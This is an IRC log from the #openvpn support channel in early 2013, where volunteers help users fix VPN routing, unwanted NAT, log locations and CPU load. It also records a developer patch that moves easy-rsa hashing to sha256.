http://sites.inka.de/~bigred/devel/tcp-tcp.html Why TCP Over TCP Is A Bad Idea. or (#2) http://www.openvpn.net/papers/BLUG-talk/14.html for a presentation by James Yonan (OpenVPN lead developer) or (#3) if you must use tcp, you likely want --tcp-nodelay 13:03 < syoma> gracias pekster 13:05 <+pekster> Normally the the connection won't be reset like that unless the client actually disconnected (or crashed or something.) Firewalls can decide to drop or reset connections too, but usually --keepalive helps maintain stateful firewalls: 13:05 <+pekster> !keepalive 13:05 <@vpnHelper> "keepalive" is (#1) see --keepalive in the manual for how to make clients retry connecting if they get disconnected. or (#2) basically it is a wrapper for managing --ping and --ping-restart in server/client mode or (#3) if you use this, don't use --tls-exit and also avoid --single-session and --inactive 13:06 -!- [1]c3vin [~c3vin@70.62.198.163] has joined #openvpn 13:09 -!- c3vin [~c3vin@70.62.198.163] has quit [Ping timeout: 240 seconds] 13:09 -!- [1]c3vin is now known as c3vin 13:17 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 13:20 < syoma> thanks pekster 13:22 <+pekster> np 13:27 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has quit [Ping timeout: 276 seconds] 13:30 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has joined #openvpn 13:31 -!- u0m3 [~Radu@92.80.118.157] has quit [Read error: Connection reset by peer] 13:34 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has left #openvpn [] 13:35 -!- u0m3 [~Radu@109.96.148.11] has joined #openvpn 13:44 -!- brute11k [~brute11k@89.249.230.219] has quit [Quit: Leaving.] 13:44 -!- brute11k [~brute11k@89.249.230.219] has joined #openvpn 13:47 -!- u0m3 [~Radu@109.96.148.11] has quit [Read error: Connection reset by peer] 13:49 -!- brute11k [~brute11k@89.249.230.219] has quit [Ping timeout: 264 seconds] 13:51 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 246 seconds] 13:58 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:58 -!- dazo is now known as dazo_afk 14:00 -!- BtbN [~btbn@btbn.de] has quit [Ping timeout: 246 seconds] 14:03 -!- BtbN [~btbn@btbn.de] has joined #openvpn 14:13 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 252 seconds] 14:18 -!- bjh4 [~bjh4@64.212.193.1] has joined #openvpn 14:24 -!- Saviq_ [~Saviq@nat/canonical/x-xgmrcgubxpeogvbo] has joined #openvpn 14:26 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 255 seconds] 14:27 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 14:27 -!- mode/#openvpn [+o mattock] by ChanServ 14:30 -!- Saviq_ [~Saviq@nat/canonical/x-xgmrcgubxpeogvbo] has quit [Ping timeout: 248 seconds] 14:32 <@ecrist> ping pekster 14:32 <@ecrist> did you ever finish that easy-rsa patch? 14:33 <+pekster> ecrist: Oh, yea, sorry. Updated patches at ... well, at a downed webhost :( 14:33 <+pekster> Let me re-mirror them... :\ 14:33 <@krzee> http://www.thewebsiteisdown.com/ 14:33 <@vpnHelper> Title: The Website Is Down (at www.thewebsiteisdown.com) 14:34 <+pekster> Oh, and it's back again. Maybe someone was playing UT instead of answering their skype calls :P 14:34 <+pekster> ecrist: http://pekster.sdf.org/misc/ovpn-patches/ 14:34 <@vpnHelper> Title: Index of /misc/ovpn-patches (at pekster.sdf.org) 14:34 <+pekster> So, basically, it removes all traces of the hash from the scripts and standardizes openssl.cnf files to use sha256 14:34 <+pekster> Previously Windows was using the openssl default of md5 while the *nix scripts were hard-coded to use sha1. Sort of a weird mix 14:37 <@krzee> ssl-admin is also using md5 14:43 <@ecrist> yeah, I should fix that, too 14:46 <@ecrist> ok, pekster, I'll apply those, they seem sensible 14:47 <+pekster> Yea, it won't impact current CAs (thingg signed with md5 or sha1 will continue to work) just new keys going forward. And sha256 is supported anything remotely recent, so if that breaks for someone they really need to make a concious decision to use older stuff 14:48 <@ecrist> yep, I agree 14:48 <+pekster> At krzee musing, I even verified the embedded-friendly PolarSSL supports it :P 14:49 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 14:52 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 15:03 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 256 seconds] 15:04 <@ecrist> pekster, can you PM me your email address? 15:05 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 15:05 <@ecrist> and your name, as you'd like it to appear in the commit? 15:07 <+pekster> Done. Not a hugely impressive patch, but progress is good, right? :P 15:08 <+pekster> I think my first 'official' patch that got merged into upstream openvpn was fixing a device qutoting bug. Sometimes it's the small things that make life better 15:09 -!- c3vin [~c3vin@70.62.198.163] has quit [Ping timeout: 240 seconds] 15:17 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 15:27 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 15:38 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 15:39 -!- Saviq_ [~Saviq@194.168.195.98] has joined #openvpn 15:46 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Read error: Connection reset by peer] 15:46 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 15:49 -!- bjh4 [~bjh4@64.212.193.1] has quit [Remote host closed the connection] 15:54 -!- Orbi [~opera@anon-185-20.vpn.ipredator.se] has quit [Quit: Orbi] 15:56 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 15:57 -!- mattock is now known as mattock_afk 15:57 -!- jY [~jy@photoblog.com] has joined #openvpn 15:58 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 16:00 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has joined #openvpn 16:05 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 16:07 < jY> what are my options to creating a routable vpn network? right now the only way I can do it is using an SNAT but then everything is shown coming from the IP of the openvpn server not the client 16:09 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit] 16:09 <+pekster> You don't need NAT at all to set up routing. What is it you're trying to accomplisih? 16:10 < jY> pekster: i have a site to site vpn 10.128.0.0/16 in CA and 10.138.0.0/16 in NY I set the vpn to be 10.113.0.0/16 16:10 < jY> vpn server is 10.128.7.70 16:11 < jY> and the only way i can hit anything on 128 is with the snat.. which changes the IP to the 7.70 16:11 <+pekster> !serverlan 16:11 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 16:11 <+pekster> And if you want to expose the LAN on the client side: 16:11 <+pekster> !clientlan 16:11 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route 16:11 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 16:11 < jY> thanks! 16:11 < jY> that'll give me enough to read about 16:13 <+pekster> Using a /16 for openvpn is just silly. If you just have a site-to-site set up, all you need is 2 IP addresses, not a subnet of 65k unique IPs 16:13 < jY> well i'm trying to subnet off admins/dev/support 16:13 < jY> so they can only hit certain servers/ports 16:14 <+pekster> My point is OpenVPN itself can't handle that kind of a load since it's single-threaded. You'd end up with problems if you loaded up a virtual /24 with users all trying to use a /24 at once 16:14 <+pekster> Declaring OpenVPN to itself serve a /16 is a waste of IPs. At least you're doing it in rfc1918 space, but it's still baad practice 16:15 <+pekster> Now routing a /16 over openvpn isn't a problem 16:15 < jY> so what are your recommendations on how i can do this? 16:15 <+pekster> Your dev/admins/support are ALL going to connect to a VPN you've set up for a site-to-site use? 16:16 <+pekster> If that's true, you need to stop and fundamently split off your user VPN from your site-linkage 16:16 < jY> they connect into the server.. but the site to site is handled by the routers 16:16 -!- blackmagic [black@got.laid.using.blackmajic.org] has quit [Ping timeout: 245 seconds] 16:16 < jY> so they aren't on the same server 16:17 <+pekster> They could be on the same server if you'd like, just different instances. It's usually a completely different setup in terms of validating your users verses a static site-to-site tunnel 16:17 < jY> ya that's the case.. its completely different 16:17 <+pekster> And stop using a /16. If you're doing 'server 10.113.0.0 255.255.0.0' you really ought to correct that. Use at most a /24 for the virutal networks 16:18 <+pekster> (unless you really know what you're doing and why you're doing it) 16:19 -!- Akuma [kvirc@82-210-136-150.home.aster.pl] has joined #openvpn 16:19 < Akuma> hello, where can I find open vpn client logs in ubuntu? 16:19 < jY> i'll take that into account but it really doesn't solve my issue with needing an snat to get out 16:20 <+pekster> You don't need NAT at all if you control the network nodes. For an rfc1918 inside an org like that there's no reason to use NAT anywhere 16:20 <+pekster> See the flowcharts, and fix your routing on both sides of the tunnel 16:20 < jY> okie 16:20 <+pekster> NAT is only ever required if you have unroutable space on one side of a router (eg: my home network "doesn't exist" as far as the rest of the public Internet is concerned, thus I need NAT on my border device) 16:22 <+pekster> Akuma: That depends entirely on how you started it. See the manpage options for --log, --log-append, --syslog, or --daemon depending on your configuration. Lacking any of those options, the logs are sent to stdout/stderr 16:22 < Akuma> ah 16:22 < Akuma> so basically if I use the gui chances are I don't have a log 16:23 <+pekster> Chances are you do. WHere it goes is entierly up to the frontend and how it calls the actual openvpn program. I can't help you with your "gui", just with openvpn 16:23 <+pekster> If you mean network-manager, see: 16:23 <+pekster> !nm 16:23 <+pekster> !netman 16:23 <@vpnHelper> "netman" is if you are using network manager for linux to configure your vpn, dont! http://openvpn.net/archive/openvpn-users/2008-01/msg00046.html to read the same thing from the author of the openvpn 2 cookbook on the mail list 16:27 -!- mode/#openvpn [-v pekster] by ChanServ 16:35 < Akuma> pekster: thank you, I managed to find; now I have another problem: the connection gets established but I have the following message: http://pastebin.com/yCuaZNUP 16:42 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 16:51 -!- u0m3 [~Radu@109.96.148.11] has joined #openvpn 16:59 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Read error: Connection reset by peer] 17:01 -!- Saviq_ [~Saviq@194.168.195.98] has quit [Quit: Ex-Chat] 17:07 -!- Akuma [kvirc@82-210-136-150.home.aster.pl] has quit [Quit: KVIrc 4.2.0 Equilibrium http://www.kvirc.net/] 17:08 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 17:08 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 17:08 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 17:08 -!- mode/#openvpn [+o krzee] by ChanServ 17:12 -!- blackmagic [black@got.laid.using.blackmajic.org] has joined #openvpn 17:31 -!- madsage [sage@2001:470:c:1292::2] has joined #openvpn 17:31 < madsage> word 17:32 <@krzee> werd sage 17:32 <@krzee> this the oldschool efnet madsage or the newer (but not new) one i seen in here before? 17:33 < madsage> yeah how you doing old friend 17:33 < madsage> and you did see me ab a year ago. i think the last time i stopped by 17:33 < madsage> ab/about 17:33 <@krzee> ahh ok, not the same from efnet then 17:34 < madsage> yes 17:34 <@krzee> how ya doin 17:34 < madsage> doing well 17:34 <@krzee> lookin for any help? 17:34 < madsage> you rememeber me from CA and stuff 17:34 < madsage> heh 17:34 <@krzee> o_O 17:34 <@krzee> that IS you? 17:35 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has quit [Read error: Connection reset by peer] 17:35 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has joined #openvpn 17:37 -!- mode/#openvpn [+v madsage] by krzee 17:37 <+madsage> thanks i passed? 17:37 <+madsage> lol 17:37 <@krzee> lol yep 17:37 <@krzee> good to see ya again 17:38 <@krzee> yanno i met you my first day on IRC 17:38 <+madsage> so i'm tunning torrent through openvpn on win8 cpuload through the roof. the server is fine though 17:38 <+madsage> nice 17:38 <+madsage> i didnt know that 17:38 <+madsage> yeah you know that was what almost 20yrs ago now 17:38 <@krzee> verse was already in that channel, brought me in, it was my first chan 17:38 <@krzee> ya, like 21 yrs ago 17:39 <+madsage> damn time flys 17:39 <+madsage> you must be an old fart now 17:39 <+madsage> haha 17:39 -!- toky [~toky@wsip-174-77-152-130.dc.dc.cox.net] has quit [Ping timeout: 276 seconds] 17:39 <@krzee> guess so, lol 17:39 <@krzee> i was hella young back then too, we all were 17:39 <@krzee> kinda explains all the different scenes we went through, and at what times 17:40 <@krzee> efnet grew up together, lol 17:40 <+madsage> i was a little older. i think i have 10yrs on you but that cool 17:40 <+madsage> is 17:40 <+madsage> so i'm tunneling torrent through openvpn on win8 cpuload through the roof. the server is fine though 17:41 <+madsage> what would cause that man, i have compression disabled and using blowfish 17:41 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Quit: This computer has gone to sleep] 17:41 <+madsage> if i pass more than 150kB i can barely run my windows its lagged so bad 17:41 <@krzee> whats taking the cpu? openvpn, openssl, or kernel? 17:42 <@krzee> and really? you use windows? 17:42 <+madsage> hah yeah 17:42 * krzee goes back to asking questions from old days in msg 17:42 <@krzee> lol 17:42 <+madsage> maybei will have better luck with linux in a vm 17:42 <+madsage> i like to game, wintendo etc 17:43 <@krzee> werd 17:43 <+madsage> the server is ubuntu 12 17:43 <+madsage> on the other side of the tunnel 17:43 <+madsage> and its like 98% idle 17:43 <@krzee> not interested in the server 17:43 <@krzee> tell me more about the client, whats eating the cpu? 17:43 <+madsage> yeah, its working well 17:44 <@krzee> my joint is almost done, which means ill need to roll another in a minute 17:44 <@krzee> :D 17:44 <+madsage> well progman shows opeenvpn at over 50%. but yeah maybe i have a networkign issue. something is bounsint it around too much 17:44 <+madsage> bouncing and redirecting 17:44 <@krzee> 3im guessing dual core 17:45 <+madsage> nope, intel quad @ 3ghz 17:45 <+madsage> core2 17:45 <@krzee> i guessed it cause openvpn is single threaded 17:45 <@krzee> if it takes 100%, it'll only do so on 1 core 17:45 <@krzee> combined % would show 50% 17:45 <@krzee> can you stop torrents, and does it go back to 0%? 17:45 <+madsage> it does 17:46 <+madsage> back to idle 17:46 <@krzee> intardesting 17:46 <+madsage> i am redirecting gateway across the tunnel 17:47 <@krzee> in your torrent app 17:47 <@krzee> how many connections are you allowing? 17:47 <@krzee> (not that it should matter) 17:47 <+madsage> there are 4 network devices, tun, lan, and a couple vmware workstation adapters 17:47 <@krzee> but ild try tuning my settings in the torrent app to find something non-offensive 17:48 <+madsage> ok, yeah that makes sense. i prolly have a shitton of connections 17:48 <+madsage> i'll look. go smok that hooter 17:48 <@krzee> im smoking now 17:48 <@krzee> no worries, i dont need to leave for it 17:48 <@krzee> might just be slow responding while breaking / rolling the next 17:48 <+madsage> ok 17:50 <+madsage> hah so global connectiosn was at 500 and max connections per torrent was 100. i dropped them down to 100 and 25 17:51 <+madsage> damn i should have checked that. 17:51 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 240 seconds] 17:53 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 17:53 <+madsage> ok openvpn at 22% now still feels laggy. i'll drop it some more 17:59 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 18:01 <+madsage> krzee, is the openvpn for linux multithreaded? 18:01 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 18:02 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 260 seconds] 18:02 <+madsage> i'm going to try use an openvpn tunnel inside a linux vm. maybe i'll have better performance 18:04 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 18:06 -!- adolfomaltez [~taro@190.62.233.253] has joined #openvpn 18:06 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn 18:07 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Client Quit] 18:07 <+madsage> that did help by t way. lowered my connctions to 8 now still pulling about 350kB. i think this is some windows 8 issue though. never seen openvpn load this high on win7 18:13 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 18:20 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 18:27 -!- toky [~toky@pool-71-171-106-213.clppva.fios.verizon.net] has joined #openvpn 18:29 <@krzee> madsage, no, no openvpn is multithreaded yet 18:29 <@krzee> maybe in ovpn3 18:39 <+madsage> ok 18:40 <+madsage> yeah i think something with win8. building a new ubuntu12 vm. i bet that works fine 18:40 <@krzee> yep but you'll find limiting connections benneficial either way 18:41 <@krzee> most decent trackers you shouldnt need many connections to get your bandwidth 18:41 <+madsage> i'll tunnel from a vm see if the milage differs. 18:41 <+madsage> yeah. i have 20mbit but the openvpn was dogged in win8 and couldnt get past 230KB 18:42 <+madsage> er 380kB 18:42 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has quit [Quit: Computer has gone to sleep.] 18:48 <+madsage> hmm found an interesting article on Windows 8 High CPU usage interrupts 18:48 <+madsage> suggests turnign off the power saving options on nic adapters 18:52 <@krzee> if you get good results let me know 18:54 -!- u0m3 [~Radu@109.96.148.11] has quit [Ping timeout: 248 seconds] 19:06 -!- toky [~toky@pool-71-171-106-213.clppva.fios.verizon.net] has quit [Ping timeout: 264 seconds] 19:12 -!- greyEAX [~marmalade@cpe-76-171-192-216.socal.res.rr.com] has joined #openvpn 19:24 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 19:30 < greyEAX> im on centos6 and i cant get openvpn to start, and there are no errors in the logs 19:31 < greyEAX> scratch that 19:31 < greyEAX> /var/log/messages says 489 openvpn[1969]: Cannot open /etc/openvpn/easy-rsa/dh1024.pem for DH parameters: error:02001002:system library:fopen:No such file or directory: error:2006D080:BIO routines:BIO_new_file:no such file 19:33 < EugeneKay> Well, does the file exist 19:34 < greyEAX> yeah 19:34 < greyEAX> oh wai 19:34 < greyEAX> god dammit 19:34 < greyEAX> its in /easy-rsa/keys/ 19:34 < greyEAX> my bad 19:34 < greyEAX> thanks 19:34 < greyEAX> it works 19:35 < EugeneKay> ;-) 19:49 -!- raidz is now known as raidz_away 19:50 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 252 seconds] 19:53 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 19:57 -!- Winston_Smith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 19:57 < cirdan> i use time.apple.com :-) 19:57 < cirdan> mt, bah. 19:58 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 252 seconds] 20:00 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 20:02 -!- Winston_Smith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 20:15 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 256 seconds] 20:16 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 20:22 -!- adolfomaltez [~taro@190.62.233.253] has left #openvpn [] 20:22 -!- adolfomaltez [~taro@190.62.233.253] has joined #openvpn 20:29 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 20:31 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 20:38 -!- Guest25591 [~nutron@unaffiliated/nutron] has quit [Remote host closed the connection] 20:38 -!- nutron [~nutron@unaffiliated/nutron] has quit [Remote host closed the connection] 20:42 -!- hunternet93 [~hunter@h64.72.22.98.dynamic.ip.windstream.net] has joined #openvpn 20:42 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 20:45 < hunternet93> What's the best option for using SMB over OpenVPN? I have a tunneled VPN set up for a small network that uses a simple workgroup (no Active Directory) to see computers on the network and share files. I have a Samba server providing WINS, but a new Windows 8 computer doesn't pick up any of the computers on the network when connected to the VPN. Is there a better way to do this? 20:46 -!- APTX [APTX@unaffiliated/aptx] has quit [Remote host closed the connection] 20:46 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 20:47 -!- adolfomaltez [~taro@190.62.233.253] has quit [Ping timeout: 255 seconds] 20:49 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn 20:50 -!- adolfomaltez [~taro@190.62.226.245] has joined #openvpn 20:52 -!- hunternet93 [~hunter@h64.72.22.98.dynamic.ip.windstream.net] has left #openvpn [] 20:59 -!- mode/#openvpn [+v pekster] by ChanServ 20:59 <+pekster> Aketzu: From earlier, those are NetworkManager logs, not openvpn logs. No clue what's wrong with openvpn. Try calling openvpn from a terminal if you really want to see what's going on 21:17 -!- brute11k [~brute11k@89.249.230.207] has joined #openvpn 21:25 <+madsage> krzee, yeah man somthing weird in win8 bro. setup everything from an ubuntu12 vm guest and pulling over 800kB/sec now and only 5% cpu for openvpn 21:26 <+pekster> 32 or 64-bit flavour openvpn install in win8? Maybe one works more efficiently than the other? 21:26 <+madsage> i was using 64bit 21:26 <+madsage> did not try 32 21:27 <+madsage> interesting though. maybe worth a try 21:27 <+pekster> It might be a test to see what it does. It "shouldn't" be noticablly slower in 64-bit, but that's possible I suppose 21:27 <+madsage> although running the tunnel from a ubuntu64 vm under win8 is also working great 21:28 <+madsage> pekster, i will try that 21:28 <+madsage> see if we have better results with the 32bit win version on win8x64 21:29 <+pekster> I've been using the 64-bit version on my windows install (Vista SP2) and haven't had any noticable issues/differences yet 21:29 <+pekster> In theory, openssl does better with some of the crypto with 64-bit, but otherwise it's basically a wash, and slightly larger executables for your trouble 21:31 <+pekster> Weird, using cygwin to run 'ldd openvpn.exe' tells me "Function not implemented" :\ 21:32 * pekster doesn't have great Windows know-how to do that outside of cygwin 21:32 -!- catsup [~d@64.111.123.163] has joined #openvpn 21:33 <+madsage> try the linux binary with cygwin 21:33 <+pekster> Otherwise, near as I can tell all the crypto dll's openvpn produces are linked to the 64-bit OS libraries 21:33 <+madsage> ok, i'm not familiar with cygwin 21:34 <+pekster> You don't "install" linux software in cygwin. You need to rebuild things from source code under the environment for stuff to work 21:34 <+madsage> oh your looking at the ldd in the exe 21:34 <+pekster> Right: http://fpaste.org/EC5V/ 21:35 <+madsage> sorry i know what ldd does. yeah i see what you are sayign there 21:36 <+pekster> I assume there's just a build option that turs off whatever ldd is probing to find the dynamic links 21:36 <+pekster> Anyway, it doesn't really matter in the end. Either 32-bit goes faster for you, or not :P 21:38 <+madsage> yeah soon as hit about 300kB/sec my OS was in the dirt. could barely even move the mouse curser 21:44 -!- shadoom [~shadoom@91-65-183-58-dynip.superkabel.de] has joined #openvpn 22:03 <+pekster> Something else has to be up then, becuase on a multi-core system ovpn can only eat a single core 22:03 <+pekster> Sounds like Windows is just blowing chunks for some silly reason 22:13 -!- adolfomaltez [~taro@190.62.226.245] has quit [Ping timeout: 248 seconds] 22:14 -!- adolfomaltez [~taro@190.62.233.158] has joined #openvpn 22:15 -!- driftor [~mike@c-67-164-101-152.hsd1.ca.comcast.net] has joined #openvpn 22:16 < driftor> our lan is 10.12.1.0/24 and our openvpn server which isn't our default gateway has a ip of 10.12.1.10 and openvpn is 10.12.2.0/24 It seems everything I do I see the traffic from vpn clients on the gateway as coming from 10.12.1.10 and not the clients vpn ip 22:16 < driftor> is there anyway to make it so the gateway sees the clients ip and not the server openvpn is running on 22:18 -!- shadoom [~shadoom@91-65-183-58-dynip.superkabel.de] has quit [Read error: Connection reset by peer] 22:18 -!- shadoom [~shadoom@91-65-183-58-dynip.superkabel.de] has joined #openvpn 22:18 <+pekster> driftor: Stop doing NAT 22:19 <+pekster> See also: 22:19 <+pekster> !serverlan 22:19 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 22:19 <+pekster> driftor: The NAT you have set up is not a feature of openvpn, so your VPN server OS is configured to NAT the VPN network, apparently 22:19 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 22:21 < driftor> i don't think i have nat setup at all 22:21 < driftor> i flushed my fw rules 22:21 <+pekster> openvpn doesn't re-write your IPs in packets. NAT does. 22:22 < driftor> hmm ok 22:22 <+pekster> What OS? 22:22 < driftor> linux 22:22 <+pekster> 'iptables-save' will show you your complete netfilter ruleset 22:23 < driftor> ok i guess i had postrouting rules somehow 22:23 < driftor> thanks! 22:26 < driftor> ok now the issue is in my routes on the gateway/fw rules on the gw 22:26 <+pekster> The flowchart you were linked above covers that step 22:27 <+pekster> You need a return route on your LAN for the VPN range (otherwise how do packets get back to the 2nd network?) 22:28 -!- APTX [APTX@unaffiliated/aptx] has quit [Remote host closed the connection] 22:30 < driftor> pekster: i can now ping from any machine in the lan to the vpn 22:30 < driftor> but can't connect from vpn to a machine 22:30 < driftor> ohh wait working 22:30 < driftor> ok i was being an idiot.. thanks works! 22:30 < driftor> thanks for the help pekster 22:31 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn 22:32 <+pekster> np 22:32 -!- driftor [~mike@c-67-164-101-152.hsd1.ca.comcast.net] has left #openvpn [] 22:41 -!- shadoom [~shadoom@91-65-183-58-dynip.superkabel.de] has quit [] 23:13 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 264 seconds] 23:30 -!- madsage [sage@2001:470:c:1292::2] has quit [Quit: My damn controlling terminal disappeared!] 23:59 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 246 seconds] --- Day changed Thu Jan 31 2013 00:03 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 246 seconds] 00:12 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 00:21 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has quit [Ping timeout: 245 seconds] 00:25 -!- adolfomaltez [~taro@190.62.233.158] has quit [Ping timeout: 248 seconds] 00:26 -!- adolfomaltez [~taro@190.62.225.178] has joined #openvpn 00:34 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has joined #openvpn 00:34 -!- mode/#openvpn [+o dazo_afk] by ChanServ 00:34 -!- dazo_afk is now known as dazo 00:34 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 01:02 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has joined #openvpn 01:20 -!- dazo [~dazo@openvpn/community/developer/dazo] has quit [Ping timeout: 245 seconds] 01:21 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 01:21 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Read error: Connection reset by peer] 01:21 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 01:24 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 01:30 -!- master_of_master [~master_of@p57B54CF7.dip.t-dialin.net] has quit [Ping timeout: 276 seconds] 01:31 -!- master_of_master [~master_of@p57B54946.dip.t-dialin.net] has joined #openvpn 01:33 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 01:34 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has joined #openvpn 01:34 -!- mode/#openvpn [+o dazo_afk] by ChanServ 01:34 -!- dazo_afk is now known as dazo 01:36 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 01:44 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 246 seconds] 01:58 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:03 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 02:07 -!- greyEAX [~marmalade@cpe-76-171-192-216.socal.res.rr.com] has quit [Read error: Connection reset by peer] 02:08 -!- flufmnstr [~fluf@68-190-201-62.dhcp.snbr.ca.charter.com] has joined #openvpn 02:09 < flufmnstr> heyo yall. im trying to find some info on the KEY_CN, KEY_NAME, and KEY_OU options in the config, but im coming up with nothing. anyone know where i can find a doc on them? 02:11 <+pekster> flufmnstr: They're just the X509 field options defined as variables that are used by the openssl.cnf config files 02:12 <+pekster> flufmnstr: ie: the KEY_CN is the CN (commonName) X509 field, the KEY_OU is the OU (orginizationalUnit) field, etc. Maybe you want docs on openssl or X509 instead? None of that is openvpn specific, except perhaps the shipped easy-rsa scripts 02:13 < flufmnstr> ah ok. ill check those out. thanks mate. 02:14 <+pekster> Just declare sensible values in your config for your use. For all it maters, define that your Org is "Earthling" and your city is "North Pole" ;) 02:17 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds] 02:26 <+pekster> I understand about 2 sentences out of this entire article: https://en.wikipedia.org/wiki/Quantum_gate 02:26 <@vpnHelper> Title: Quantum gate - Wikipedia, the free encyclopedia 